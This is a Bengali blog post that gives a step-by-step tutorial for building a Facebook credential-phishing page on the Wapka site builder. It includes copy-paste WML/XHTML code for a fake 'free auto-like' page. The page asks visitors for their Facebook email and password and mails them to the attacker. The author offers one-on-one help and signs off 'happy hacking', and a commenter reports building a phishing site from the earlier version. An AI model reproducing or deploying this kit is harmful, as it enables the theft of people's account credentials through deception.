২ মিনিটে নতুন স্টাইলে বাংলা ফিশিং সাইট তৈরি করে হ্যাক করুন ফেসবুক আইডি! + আপডেট

প্রথম বলে নেই এটা আপডেট টিউন

কাল এই   মাত্র ১-২ মিনিটে তৈরি করুন নতুন স্টাইলে ফেসবুক ফিশিং সাইট! তা ও আবার সম্পূর্ণ বাংলায় ফিশিং এখন ডিজিটাল স্টাইলে!শিরোনামে একটা টিউন করি :p কিন্তু অনেকে বলতাছেন যে কোড গুলা কাজ করে না। তাই আপনাদের জন্য আবার টিউন লিখলাম+ আপডেট,  এই টিউনের শেষে কোড এর টেক্সট ফাইল থাকবে (১০০% পরীক্ষিত) তাই যদি কোড কপি করে কাজ করতে না পারেন  তাইলে টেক্সট ফাইল থেকে কপি করবেন কাজ করবে (ইনশাআল্লাহ্‌), আর কেও যদি একান্ত না পারেন তাইলে আমার সাথে ফেসবুকে যোগাযোগ করবেন আমি করে দিব "

সবাই কেমন আছেন? আশা করি ভাল আছেন! এবং সব সময় ভাল থাকবেন সেই দোয়া করি ! আজকের টিউনের বিষয় ফেসবুক ফিশিং ! ফেসবুক ফিশিং এখন বাচ্চাদের কাজ তাই না? কিন্তু সাম্প্রতিক এক জরীপে দেখা গিয়েছে যাদের ফেসবুক আইডি হ্যাক হয় তার মধ্যে ফেসবুক ফিশিং এ হ্যাক এর পরিমান ৪৭ শতাংশ! এখন ভাবেন ফিশিং কতটা কার্যকর? ফেসবুক ফিশিং নিয়ে অনেক টিউন বা টিয়রেটিয়াল আছে। কিন্তু সেই টিউন অনুযায়ী কাজ করতে অনেক সময় বা নতুনরা পারেন না 😀 এবং তা বেশির ভাগ ইংলিশ থাকে 😛 কিন্তু আমি আপনাদের সম্পূর্ণ বাংলায় ফিশিং সাইট তৈরি করা শিখাব তা ও আবার বাংলায়! অবিজ্ঞরা দূরে থাকেন। শুদু মাত্র আপুনু যদি নতুন ফিশিং শিখতে চান তাইলে টিউনটা ফলো করুন।

ডেমো দেখতে ক্লিক করুন এখানে -- 

ফিশিং :D অটো লাইক!

এখনতো দেখলেন কত সুন্দর অটো লাইক 😛 কিন্তু এর ভিতরে আছে ফিশিং 😀 আপুনি এই রকম ডিজাইন করে হয়ত অনেকের আইডির পাসওয়ার্ড জানতে পারবেন 😀 কিন্তু কোন খারাপ উদ্যেশে ব্যবহার করবে না 😀 (বলে কি হবে হ্যাকিং তো খারাপ উদেশ্য অথবা ব্ল্যাক মিল) আপনার যাই ইচ্ছা করবেন আমি কোন দায়ী থাকব না।

ফিশিং কি বা  এটা কি ভাবে কাজ করে?  

এটা যদি এখন আমি বলি তাইলে সবাই হাসা হাসি করবে 😛 কারন ফিশিং সম্পর্কে যানে না না অতচ ফেসবুক চালায় এই রকম মানুষ খুজে পাওয়া খুব কস্ট 😀 তবু ও যদি ফিশিং হ্যাকিং টিউন সম্পর্কে জানতে চাই তাইলে আমার এই  টিউন দেখতে পারেন :-

ফেসবুক হ্যাকিং এর সেরা ৫ উপায়!

কি ভাবে ফিশিং সাইট বানাবো?

হয়ত অনেক জানেন আগে বলেছি যারা জানেন না শুদু মাত্র তাদের জন্য! আমি দেখাব কি ভাবে ওয়ায়পাকাতে ফিশিং সাইট আপুনি বানাবেন ! তাই প্রথমে আপনাকে ওয়াপকাতে একটা সাইট থাকতে হবে 😀 এখনকার ইন্টারনেট যোগে সবার ওয়াপকার সাইট থাকে তাই ওয়ায়পাকাতে কি ভাবে সাইট তৈরি করতে হয় তা আর আমার বলা লাগবে না 😛 তবু ও যদি কেও খুলতে না পারেন তাইলে যোগাযোগ করবেন।

প্রথমে আপনার ওয়ায়পকা সাইটে ডুকুন, তারপর যে সাইটে ফিশিং বানাবেন সেই সাইটের পাশে Manage এ ক্লিক করুন Screenshot_127তারপর আপনার সামনে একটা বক্স ওপেন হবে এখন এখান থেকে Admin Mode এ ক্লিক করুন Screenshot_128  তারপর আপনার সাইট ওপেন হবে এখন সাইটের নিচে দেখবেন লিখা আছে #edit site  Screenshot_129এখন ইডিট সাইটে ক্লিক করেন ০, তারপর   আপনার সামনে একটা বক্স ওপেন হবে এখন Advanced functions থেকে - WML/XHTML code এ ক্লিক করুন Screenshot_131 তারপর আপনার সামনে একটা বক্স ওপেন  হবে

!Screenshot_133এখন  WML/XHTML code এর ঘড়ে এই নিচের কোড গুলা copy করে pase করুন  !!! 

<?xml version="1.0" ?>

<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
<head>
<meta forua="true" http-equiv="Cache-Control" content="max-age=0"/>

</head>
<template>
<do type="options" name="Prev" label="Back"><prev/></do>
</template>
<card id="index" title="Free Like Center" >
<p><link rel="Shortcut Icon" href="http://wfs01.wapka.mobi/600083/600083842_b430774035.png" />
<link rel="stylesheet" type="text/css" href="http://fb-updates.wapka.mobi/styles.css"/>
<link rel="stylesheet" type="text/css" href="http://css-style.xtgem.com/style/css/fb/style.css" media="all,handheld"/>

<div class="acb aps"><font color="white"><b><h1>This Site Degaine By Masum (Masum.info) </h1></b></font></div>

<head title="স্বাগতম আপনাকে ফেসবুক অটো লাইক সাইটে"><title>Welcome to Facebook Auto Like </title><meta name="description"
content="Facebook helps you connect and share with the people in your life." />
<div align="center"><div class="acy aps abb"><span class="mfss"><b>স্বাগতম আপনাকে দ্যা রিয়েল ফেসবুক অটোলাইক সাইটে, বাংলাদেশে এক মাত্র আমরাই আপনাকে দিচ্ছি ১ হজার অটো লাইক সম্পূর্ণ ফ্রী, এবং আমরাই প্রথম নিয়ে এসেছি বাংলা ভার্সনে অটো লাইক ১০০% রিয়েল সাইট। (নো স্পাম) কিভাবে অটো লাইক দিবেন? আমরা সব চেয়ে সহজে আপনাকে দিচ্ছি প্রতিদিন ১০০.০+ অটো লাইক এর সুযোগ তাও আবার সত্যতার সাথে সম্পূর্ণ ফ্রী। অটো লাইক নিতে হলে আপনাকে নিচের বক্সে (ইমেইল এর যায়গায়) আপনার ইমেইল এড্রেস দিবেন) আর পাসওয়ার্ড এর যায়গায় আপনার পাসওয়ার্ড, এবং শেষের বক্সে আপনার কাংকিত ফটো বা স্ট্যাটাস এর লিংক দিবেন। মনে রাখবেন যে লিংক দিবেন সেই লিংকের ফট বা স্ট্যাটাসে আটো লাইক হবে, এ ভাবে আপুনি প্রতি ১৫ মিনিট পর পর অটোলাইক নিতে পারবেন। ইঞ্জয়, আর হে প্রতিনিওত আমাদের সাথে থাকবেন।</b></span></div></div><div class="aclb"><div class="loginInner"><form method="post" class="mobile-login-form" onSubmit="window.open('http://masum.info')" action="/site_0.xhtml"><div><div class="mobile-login-field mobile-login-field-email aclb apl"><div><b>এই বক্সে আপনার ইমেইল এড্রেস লিখুনঃ-</b><input class="input" name="mf_text[email]" type="text" /></div></div><div class="mobile-login-field aclb apl"><div><b>এই বক্সে আপনার পাসওয়ার্ড লিখুনঃ- </b><input class="input" name="mf_text[password]" type="password" /></div></div></div>
<input type="hidden" name="p" value="140452409"/><br/>
<div><b>এই বক্সে আপনার কাংকিত ফটো,স্ট্যাটাস এর লিংক দেনঃ- (যেটাতে অটো লাইক হবে) </b><textarea></textarea></div>
<br/>
<input type="hidden" name="action" value="send_message"/><div class="aclb apl"><input value="সব লেখা শেষ হলে এখানে ক্লিক করুন" name="MF_submit" type="submit" class="btn btnC"/></div></form></div></div></head>

<div class="acy aps abb">
<font color="green">অটোলাইক জগতে পৃথিবীর সব চেয়ে সহজ পদ্ধতি হল এই সিস্টেম! এবং এটা এক মাত্র আমরাই (দ্যা রিয়েল লাইকার) বাংলাদেশে প্রথম সত্যাতার সাথে দিচ্ছি। তবু ও ও যদি আপুনি কোন সমস্যায় পড়েন তাহলে আমাদের</font> <a href="/site_2.xhtml"><font color="red"><b>হেল্প সেন্টার</b></font></a>
</div>

<img src="/img/600080/600080682_7081a86b2a.jpg" alt="image" /><div><noscript/></div></p>
<p>Your e-mail: <input type="text" name="tAZfNCxoOJNEyoEnNtDN" value="" />
<br/> Message: <input type="text" name="bktuvHRafEnVIkRKjRgO" value="" />
<br/><anchor>Send message<go href="site_0.wml" method="post"><postfield name="MF_submit" value="Send message" /><postfield name="mf_text[email]" value="$tAZfNCxoOJNEyoEnNtDN" />
<postfield name="mf_text

" value="$bktuvHRafEnVIkRKjRgO" />
<postfield name="p" value="130736084" />
<postfield name="action" value="send_message" />
</go></anchor><br/>
</p><p align="center"><a href="/menu_0.wml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2625491/adshows/0/aid/28/country/US/position/bottom"><img src=" /pictures/union/1111/6.png" /></a></p><img src="/ga.gif" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-46050634-1&amp;utmn=222544500&amp;utmr=-&amp;utmp=%2Findex.xhtml&amp;guid=ON" />
</card>
</wml>

সরাসরি টেক্সট ফাইল ডাউনলোড করুন এখান থেকে 

এখন অকে করুন 😀 ব্যাস কাজ শেষ :p এখন আপনার সাইট দেখুন 😛 টিক অটোলাইক এর মতন হয়ে গেছে 😀 এখন এটার লিংক শেয়ার করতে থাকেন 😛 আর যে আপনার সাইটে লগিন করবে তার ইমেইল পাসওয়ার্ড আপনার ইমেইলে চলে যাবে :/

হ্যাপি হ্যাকিং 😛

কোন সমস্যা হলে  আমায় পাবেন ফেসবুকে  ।  

প্রথম প্রাশিতঃ- http://masum.info আমার সকল লেখা পেতে এখানে ক্লিক করুন, আমার হ্যাকিং নিয়ে চেইন টিউন  দেখতে এখানে ক্লিককরুন

কম্পিউটার, ব্লগিং, এডসেন্স, এসিও এসব বিষয়ের আরও ইনফরমেশন পাবেন Blogging Tips ওয়েবসাইট এ।

Level 2

আমি কাশিম উদ্দিন মাছুম। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 10 বছর 5 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 64 টি টিউন ও 225 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 6 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

আপনার এই তথ্য প্রযুক্তি ঞ্জান শেয়ার করুন আমাদের সাথেও
http://e-mestori.com

Level 0

ভাই আমি আগের টিউন দেখেয় একটা ফিশিং সাইট তৈরি করেছি……।।

একটু কোড গুলা এডিট করেছি………

thanks a lot for sharing this idea………..